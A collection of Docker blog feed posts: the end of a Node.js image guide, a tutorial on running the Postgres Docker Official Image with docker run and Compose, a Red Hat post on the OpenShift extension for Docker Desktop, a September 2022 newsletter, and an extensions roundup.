In this guide, we explored many ways to optimize your Docker images — from carefully crafting your Dockerfile to securing your image via Snyk scanning. Building better Node.js apps doesn’t have to be complex. By nailing some core fundamentals, you’ll be in great shape. 

If you’d like to dig deeper, check out these additional recommendations and best practices for building secure, production-grade Docker images:

Docker development best practicesDockerfile best practicesBuilding images with BuildKitBest practices for scanning images Getting started with the Snyk Extension
Quelle: https://blog.docker.com/feed/

How to Use the Postgres Docker Official Image

Postgres is one of the top relational, multi-model databases currently available. It’s designed to power database applications — which either serve important data directly to end users or through another application via APIs. Your typical website might fit that first example well, while a finance app (like PayPal) typically uses APIs to process GET or POST database requests. 

Postgres’ object-relational structure and concurrency are advantages over alternatives like MySQL. And while no database technology is objectively the best, Postgres shines if you value extensibility, data integrity, and open-source software. It’s highly scalable and supports complex, standards-based SQL queries. 

The Postgres Docker Official Image (DOI) lets you create a Postgres container tailored specifically to your application. This image also handles many core setup tasks for you. We’ll discuss containerization, and the Postgres DOI, and show you how to get started.

In this tutorial:

Why should you containerize Postgres? What’s the Postgres Docker Official Image?Can you deploy Postgres containers in production?How to run Postgres in DockerEnter a quick pull commandStart a Postgres instanceUsing Docker ComposeExtending your Postgres image1. Environment variables2. Docker secrets3. Initialization scripts4. Database configurationImportant caveats and data storage tipsJumpstart your next Postgres project today

Why should you containerize Postgres? 

Since your Postgres database application can run alongside your main application, containerization is often beneficial. This makes it much quicker to spin up and deploy Postgres anywhere you need it. Containerization also separates your data from your database application. Should your application fail, it’s easy to launch another container while shielding your data from harm. 

This is simpler than installing Postgres locally, performing additional configuration, and starting your own background processes. Such workflows take extra time, require deeper technical knowledge, and don’t adapt well to changing application requirements. That’s why Docker containers come in handy — they’re approachable and tuned for rapid development.

What’s the Postgres Docker Official Image?

Like any other Docker image, the Postgres Docker Official Image contains all source code, core dependencies, tools, and libraries your application needs. The Postgres DOI tells your database application how to behave and interact with data. Meanwhile, your Postgres container is a running instance of this standard image.

Specifically, Postgres is perfect for the following use cases:

Connecting Docker shared volumes to your applicationTesting your storage solutions during developmentTesting your database application against newer versions of your main application or Postgres itself

The PostgreSQL Docker Community maintains this image and added it to Docker Hub due to its widespread appeal.

Can you deploy Postgres containers in production?

Yes! Though this answer comes with some caveats and depends on how many containers you want to run simultaneously. 

While it’s possible to use the Postgres Official Image in production, Docker Postgres containers are best suited for local development. This lets you use tools like Docker Compose to collectively manage your services. You aren’t forced to juggle multiple database containers at scale, which can be challenging. 

Launching production Postgres containers means using an orchestration system like Kubernetes to stay up and running. You may also need third-party components to supplement Docker’s offerings. However, you can absolutely give this a try if you’re comfortable with Kubernetes! Arctype’s Shanika Wickramasinghe shares one method for doing so.

For these reasons, you can perform prod testing with just a few containers. But, it’s best to reconsider your deployment options for anything beyond that.

How to run Postgres in Docker

To begin, download the latest Docker Desktop release and install it. Docker Desktop includes the Docker CLI, Docker Compose, and supplemental development tools. Meanwhile, the Docker Dashboard (Docker Desktop’s UI component) will help you manage images and containers. 

Afterward, it’s time to Dockerize Postgres!

Enter a quick pull command

Pulling the Postgres Docker Official Image is the fastest way to get started. In your terminal, enter docker pull postgres to grab the latest Postgres version from Docker Hub. 

Alternatively, you can pin your preferred version with a specific tag. Though we usually associate pinning with Dockerfiles, the concept is similar to a basic pull request. 

For example, you’d enter the docker pull postgres:14.5 command if you prefer postgres v14.5. Generally, we recommend using a specific version of Postgres. The :latest version automatically changes with each new Postgres release — and it’s hard to know if those newer versions will introduce breaking changes or vulnerabilities. 

Either way, Docker will download your Postgres image locally onto your machine. Here’s how the process looks via the CLI:

Once the pull is finished, your terminal should notify you. You can also confirm this within Docker Desktop! From the left sidebar, click the Images tab and scan the list that appears in the main window. Docker Desktop will display your postgres image, which weighs in at 355.45 MB.

Postgres is one of the slimmest major database images on Docker Hub. But alpine variants are also available to further reduce your image sizes and include basic packages (perfect for simpler projects). You can learn more about Alpine’s benefits in our recent Docker Official Image article.

Next up, what if you want to run your new image as a container? While many other images let you hover over them in the list and click the blue “Run” button that appears, Postgres needs a little extra attention. Being a database, it requires you to set environment variables before forming a successful connection. Let’s dive into that now.

Start a Postgres instance

Enter the following docker run command to start a new Postgres instance or container: 

docker run –name some-postgres -e POSTGRES_PASSWORD=mysecretpassword -d postgres

This creates a container named some-postgres and assigns important environment variables before running everything in the background. Postgres requires a password to function properly, which is why that’s included. 

If you have this password already, you can spin up a Postgres container within Docker Desktop. Just click that aforementioned “Run” button beside your image, then manually enter this password within the “Optional Settings” pane before proceeding. However, you can also use the Postgres interactive terminal, or psql, to query Postgres directly:

docker run -it –rm –network some-network postgres psql -h some-postgres -U postgres
psql (14.3)
Type "help" for help.

postgres=# SELECT 1;
?column?
———-
1
(1 row)

Using Docker Compose

Since you’re likely using multiple services, or even a database management tool, Docker Compose can help you run instances more efficiently. With a single YAML file, you can define how your services work. Here’s an example for Postgres:

services:

db:
image: postgres
restart: always
environment:
POSTGRES_PASSWORD: example
volumes:
– pgdata:/var/lib/postgresql/data

volumes:
pgdata:

adminer:
image: adminer
restart: always
ports:
– 8080:8080

You’ll see that both services are set to restart: always. This makes our data accessible whenever our applications are running and keeps the Adminer management service active simultaneously. When a container fails, this ensures that a new one starts right up.

Say you’re running a web app that needs data immediately upon startup. Your Docker Compose file would reflect this. You’d add your web service and the depends_on parameter to specify startup and shutdown dependencies between services. Borrowing from our docs on controlling startup and shutdown order, your expanded Compose file might look like this:

services:
web:
build: .
ports:
– "80:8000"
depends_on:
db:
condition: service_healthy
command: ["python", "app.py"]

db:
image: postgres
restart: always
environment:
POSTGRES_PASSWORD: example
healthcheck:
test: [“CMD-SHELL”, “pg_isready”]
interval : 1s
timeout: 5s
retries: 10

adminer:
image: adminer
restart: always
ports:
– 8080:8080

To launch your Postgres database and supporting services, enter the docker compose -f [FILE NAME] up command. 

Using either docker run, psql, or Docker Compose, you can successfully start up Postgres using the Official Image! These are reliable ways to work with “default” Postgres. However, you can configure your database application even further.

Extending your Postgres image

There are many ways to customize or configure your Postgres image. Let’s tackle four important mechanisms that can help you.

1. Environment variables

We’ve touched briefly on the importance of POSTGRES_PASSWORD to Postgres. Without specifying this, Postgres can’t run effectively. But there are also other variables that influence container behavior: 

POSTGRES_USER – Specifies a user with superuser privileges and a database with the same name. Postgres uses the default user when this is empty.POSTGRES_DB – Specifies a name for your database or defaults to the POSTGRES_USER value when left blank. POSTGRES_INITDB_ARGS – Sends arguments to postgres_initdb and adds functionalityPOSTGRES_INITDB_WALDIR – Defines a specific directory for the Postgres transaction log. A transaction is an operation and usually describes a change to your database. POSTGRES_HOST_AUTH_METHOD – Controls the auth-method for host connections to all databases, users, and addressesPGDATA – Defines another default location or subdirectory for database files

These variables live within your plain text .env file. Ultimately, they determine how Postgres creates and connects databases. You can check out our GitHub Postgres Official Image documentation for more details on environment variables.

2. Docker secrets

While environment variables are useful, passing them between host and container doesn’t come without risk. Docker secrets let you access and load those values from files already present in your container. This prevents your environment variables from being intercepted in transit over a port connection. You can use the following command (and iterations of it) to leverage Docker secrets with Postgres: 

docker run –name some-postgres -e POSTGRES_PASSWORD_FILE=/run/secrets/postgres-passwd -d postgres

Note: Docker secrets are only compatible with certain environment variables. Reference our docs to learn more.

3. Initialization scripts

Also called init scripts, these run any executable shell scripts or command-based .sql files once Postgres creates a postgres-data folder. This helps you perform any critical operations before your services are fully up and running. Conversely, Postgres will ignore these scripts if the postgres-data folder initializes.

4. Database configuration

Your Postgres database application acts as a server, and it’s beneficial to control how it runs. Configuring your database not only determines how your Postgres container talks with other services, but also optimizes how Postgres runs and accesses data. 

There are two ways you can handle database configurations with Postgres. You can either apply these configurations locally within a dedicated file or use the command line. The CLI uses an entrypoint script to pass any Docker commands to the Postgres server daemon for processing. 

Note: Available configurations differ between Postgres versions. The configuration file directory also changes slightly while using an alpine variant of the Postgres Docker Official Image.

Important caveats and data storage tips

While Postgres can be pretty user-friendly, it does have some quirks. Keep the following in mind while working with your Postgres container images: 

If no database exists when Postgres spins up in a container, it’ll create a default database for you. While this process unfolds, that database won’t accept any incoming connections.Working with a pre-existing database is best when using Docker Compose to start up multiple services. Otherwise, automation tools may fail while Postgres creates a default.Docker will throw an error if a Postgres container exceeds its 64 MB memory allotment.You can use either a docker run command or Docker Compose to allocate more memory to your Postgres containers.

Storing your data in the right place

Data accessibility helps Postgres work correctly, so you’ll also want to make sure you’re storing your data in the right place. This location must be visible to both Postgres and Docker to prevent pesky issues. While there’s no perfect storage solution, remember the following: 

Writing files to the host disk (Docker-managed) and using internal volume management is transparent and user-friendly. However, these files may be inaccessible to tools or apps outside of your containers. Using bind mounts to connect external data to your Postgres container can solve data accessibility issues. However, you’re responsible for creating the directory and setting up permissions or security.

Lastly, if you decide to start your container via the docker run command, don’t forget to mount the appropriate directory from the host. The -v flag enables this. Browse our Docker run documentation to learn more.

Jumpstart your next Postgres project today

As we’ve discovered, harnessing the Postgres Docker Official Image is pretty straightforward in most cases. Since many customizations are available, you only need to explore the extensibility options you’re comfortable with. Postgres even supports extensions (like PostGIS) — which could add even deeper functionality. 

Overall, Dockerizing Postgres locally has many advantages. Swing by Docker Hub and pull your first Postgres Docker Official Image to start experimenting. You’ll find even deeper instructions for enhancing your database setup on our Postgres GitHub page. 

Need a springboard? Check out these Docker awesome-compose applications that leverage Postgres: 

Build a Go server with an NGINX proxy and a Postgres database.Create a sample Postgres and pgAdmin management setup.Build a React application with a Rust backend and Postgres database.Create a Java application with Spring Framework and a Postgres database.

Quelle: https://blog.docker.com/feed/

Simplified Deployment of Local Container Images to OpenShift

This guest post is courtesy of our friends over at Red Hat! They’re coming out with some exciting capabilities for the OpenShift Docker Extension and have even more planned in the future. Continue reading to learn more about what the OpenShift Extension is all about, its new features, and how to get started.

Simplified local container image deployment to remote OpenShift environments

Docker Desktop is a commonly used tool to build container images and run them locally. But oftentimes, you need to deploy your apps on an environment other than your localhost. One popular target is Kubernetes or OpenShift. So, as a developer and user of Docker Desktop, how can you deploy local containers onto remote OpenShift environments, without ever leaving the Docker Desktop UI? The answer lies in the Red Hat OpenShift Extension for Docker Desktop.

At Red Hat, we want to make the experience simple when developers target Kubernetes as the runtime environment for their containerized applications. Together with Docker Inc, we have developed the OpenShift Extension for Docker Desktop. This extension allows developers to deploy their Docker containers on a free Developer Sandbox for Red Hat OpenShift environment (that they can sign up for). Or they can use any other OpenShift cluster of their choice that they can configure. Developers can do all of this without leaving the Docker Desktop UI.

OpenShift Extension capabilities

The Red Hat OpenShift Extension for Docker Desktop enables developers who are working with OpenShift to deploy and test their apps with ease. From the extension UI, it just takes two steps to deploy your containerized app to OpenShift:

Choose Target OpenShift context. Choose the Docker image that you want to deploy to OpenShift.

The Red Hat OpenShift Extension provides the following capabilities:

Detection of Kubernetes environments: Scan your local kube-config file and preselect your current Kubernetes context. Users can also quickly switch from one environment to another.   Login to Clusters: Users can connect to a new Kubernetes environment on their local workstation by directly using the connection details. The oc login command can be conveniently pasted into the Cluster URL field to automagically separate the URL and the bearer token parts into respective fields. Listing of projects (namespace): Browse and select the project in which you want to deploy your application.Selection of container images: Pick and choose the container image you already have built and pushed to a container registry. Deployment of container images: Generate resources needed to deploy your container images. Route gets generated automatically to expose your application outside of the cluster. Once deployed, the application automatically opens in a new browser tab. Push to DockerHub and deploy: Users can select the container image, push it to Docker Hub, and deploy to OpenShift in a single click.Push image to OpenShift registry and deploy: Users can select the container image, push it to OpenShift Registry, and deploy to OpenShift in one swift motion.Open the Console Dashboard: Quickly accessible from the extension UI, users can open the OpenShift Console Dashboard in the browser, if it’s exposed.Free access to OpenShift Developer Sandbox: Users can create a free account on OpenShift Developer Sandbox to get an OpenShift environment in the cloud.  

Getting started with the OpenShift Extension

The following is a quick walkthrough covering setup and usage for the Red Hat OpenShift Extension for Docker Desktop.

Discovering and experimenting with Red Hat OpenShift 

While the extension only works with Red Hat OpenShift, if you don’t have access to it  — no worries, we’ve got you covered. You can sign-up for a free Red Hat Developer Sandbox and get an OpenShift environment in the cloud. No setup needed! 

What the future holds on the extension 

Red Hat is committed to adding more capabilities to the extension. One of our favorite features is Watch Mode. Using this feature, the extension will watch for changes in your source code and automatically build, push, and deploy the application on the preferred OpenShift cluster.   

Get started with the Red Hat OpenShift Docker Extension

The Red Hat OpenShift Extension is available on the extensions marketplace. To get a free Red Hat OpenShift environment and try out the extension, explore our Red Hat Developer Sandbox.

Learn more and get involved

If you’d like to learn more about the OpenShift Extension for Docker Desktop, visit the following:

OpenShift Docker Desktop Extension RepositoryCheck out the on-demand session of Introducing Red Hat OpenShift Extension for Docker Desktop at DockerCon. 

If you want to share your feedback, suggestions, and ideas or report an issue, please use the GitHub repository for the extension.

Want to learn more about Red Hat, other Docker Extensions, and more container-related topics? See the following for additional information.

Download and install Docker Desktop for Windows, Linux, or Mac. Find more details on the Red Hat OpenShift Extension. Read similar articles covering new Docker Extensions.Search for more handy extensions on Docker Hub. Learn how to create your own Docker Extensions.Check out the repository for the OpenShift Extension. Start a free developer sandbox for Red Hat OpenShift. 
Quelle: https://blog.docker.com/feed/

September 2022 Newsletter

Hacktoberfest 2022
Since the launch of Docker Extensions, we’ve received numerous requests from the community, asking for new extensions they’d like to see implemented. That’s why we’re glad to announce that we’ll be official partners of Hacktoberfest 2022 with Docker Extensions!

Learn More

News you can use and monthly highlights:
Opinionated Docker development workflow for Node.js projects – Are you planning to containerize your Node.js project? Here’s a quick step-by-step guide for developing and testing your Node.js app using Docker and best practices.
A command line tool to create development environments for AI/ML based on buildkit – Is your AI/ML development team still facing the challenge of system dependencies and clunky things that often break your app? If yes, then check out this new command line tool! Envd will help you create the container-based development environment for your AI/ML solution.
The smallest Docker image to serve static websites – Would you believe us if we said you can host your website on a 154KB Docker container? See for yourself! Here’s an article that shows how you can successfully run a static website on such a tiny Docker container.
Using Docker manifest to create multi-arch images on AWS Graviton processors – Building Docker images for multiple architectures has become increasingly popular. This blog post introduces a Docker manifest utility that helps developers build separate images for each architecture. These can then be joined into a multi-arch image when it’s time to share.
Deploying and Scaling the Official Strapi Demo App “FoodAdvisor” with Kubernetes and Docker – Here’s an article that shows how a shift from the monolith to microservice architecture can help you build a highly scalable and performant application.

Monthly Extensions Roundup: Test APIs, Use Oracle SQLcl, and More!
Find out what’s new this month in the Docker Extension Marketplace! Access InterSystems, test APIs, use Oracle SQLcl, and backup/share volumes — right from Docker Desktop.

Learn More

The latest tips and tricks from the community:

How to Colorize Black & White Pictures With OpenVINO™ on Ubuntu Containers
Containerizing a Slack Clone App Built with the MERN Stack
Four Ways Docker Boosts Enterprise Software Development
Clarifying Misconceptions About Web3 and Its Relevance With Docker
Bring Continuous Integration to Your Laptop With the Drone CI Docker Extension

Community All-Hands Recap
The sessions from our 6th Community All-Hands are now available to watch on-demand. If you couldn’t make it to the event, fear not! You can still join in and learn at your own pace. Here’s what you missed.

Get the Recap

Educational content created by the experts at Docker:

How to Set Up Your Local Node.js Development Environment Using Docker
How to Build and Run Next.js Applications with Docker, Compose, & NGINX
How to Use the Alpine Docker Official Image
What is the Best Container Security Workflow for Your Organization?
Dear Moby: Kubernetes in Production Environments

Docker Captain: James Spurin
We couldn’t be more excited to whalecome James Spurin to the Captain crew. Learn more about his free K8s intro course focused on community giveback, his goals for the Docker community, and a few of his favorite Dockerfile best practices.

Meet the Captain

See what the Docker team has been up to:

Extending Docker’s Integration with containerd
The Docker-Sponsored Open Source Program has a new look!
Integrated Terminal for Running Containers, Extended Integration with Containerd, and More in Docker Desktop 4.12
Announcing Docker Hub Export Members
Conversation with RedMonk: Developer Engagement in the Remote Work Era

Back Up and Share Docker Volumes with This Extension
We’ve heard your feedback and added the ability to back up and share volumes right within Docker Desktop! Our new Volumes Backup & Share Extension lets you easily back up, clone, restore, and share Docker volumes. 

Learn More

Subscribe to our newsletter to get the latest news, blogs, tips, how-to guides, best practices, and more from Docker experts sent directly to your inbox once a month.

Quelle: https://blog.docker.com/feed/

September Extensions Roundup: Test APIs, Use Oracle SQLcl, and More

Docker Extensions build new functionality into Docker Desktop, extend its existing capabilities, and allow you to discover and integrate additional tools that you’re already using with Docker. More extensions are added every month, so let’s take a look at some of them released in September. And if you’d like to see everything available, check out our full Extensions Marketplace!

InterSystems

The new InterSystems extension is a convenient way to access InterSystems Container Registry right from Docker Desktop. It provides an integrated UI that contains public and private images for products like IRIS, IRIS for Health, and many more. With the extension, you can:

Observe the list of public images available — and private images if you have access to WRCFilter images by name, tag, and ARM64Easily pull imagesDelete local imagesCopy image name with tag

Microcks

Looking to Mock or test an API? If so, the Microcks extension can help. With Microcks, you can:

Mock REST APIs importing local OpenAPI specification or Postman collectionsMock GraphQL APIs importing GraphQL Schema and samples via Postman collectionsMock gRPC APIs importing Protobuf and samples via Postman collectionsSimulate event-driven APIs (both on Kafka and WebSockets) importing AsyncAPI specificationTest local REST, GraphQL, gRPC, WebSocket and Kafka endpoints to check conformanceBootstrap your API specification using Direct APIs

Oracle SQLcl Client Tool

Oracle SQLcl (SQL Developer Command Line) is a Java-based command line interface for Oracle Database. Using SQLcl, you can execute SQL and PL/SQL statements in interactive or batch mode. The Oracle SQLcl Client Tool extension provides:

Inline editingStatement completionCommand recallSupport for your existing SQL*Plus scripts

Volumes Backup & Share

Volumes are the best choice when you need to back up, restore, or migrate data from one Docker host to another. With the Volumes Backup & Share extension, you can:

Back up data that’s persisted in a volume (for example, database data from Postgres or MySQL) into a compressed fileUpload your backup to Docker Hub and share it with anyoneCreate a new volume from an existing backup or restore the state of an existing volumeTransfer your local volumes to a different Docker host (through SSH)Other basic volume operations like clone, empty, and delete a volume

To learn more check out our blog post.

Check out the latest Docker Extensions with Docker Desktop

Docker is always looking for ways to improve the developer experience. We hope that these new extensions will make your life easier and that you’ll give them a try! Check out these resources for more info on extensions:

Try September’s newest extensions by installing Docker Desktop for Mac, Windows, or Linux.Visit our Extensions Marketplace to see all of our extensionsBuild your own extension with our Extensions SDK
Quelle: https://blog.docker.com/feed/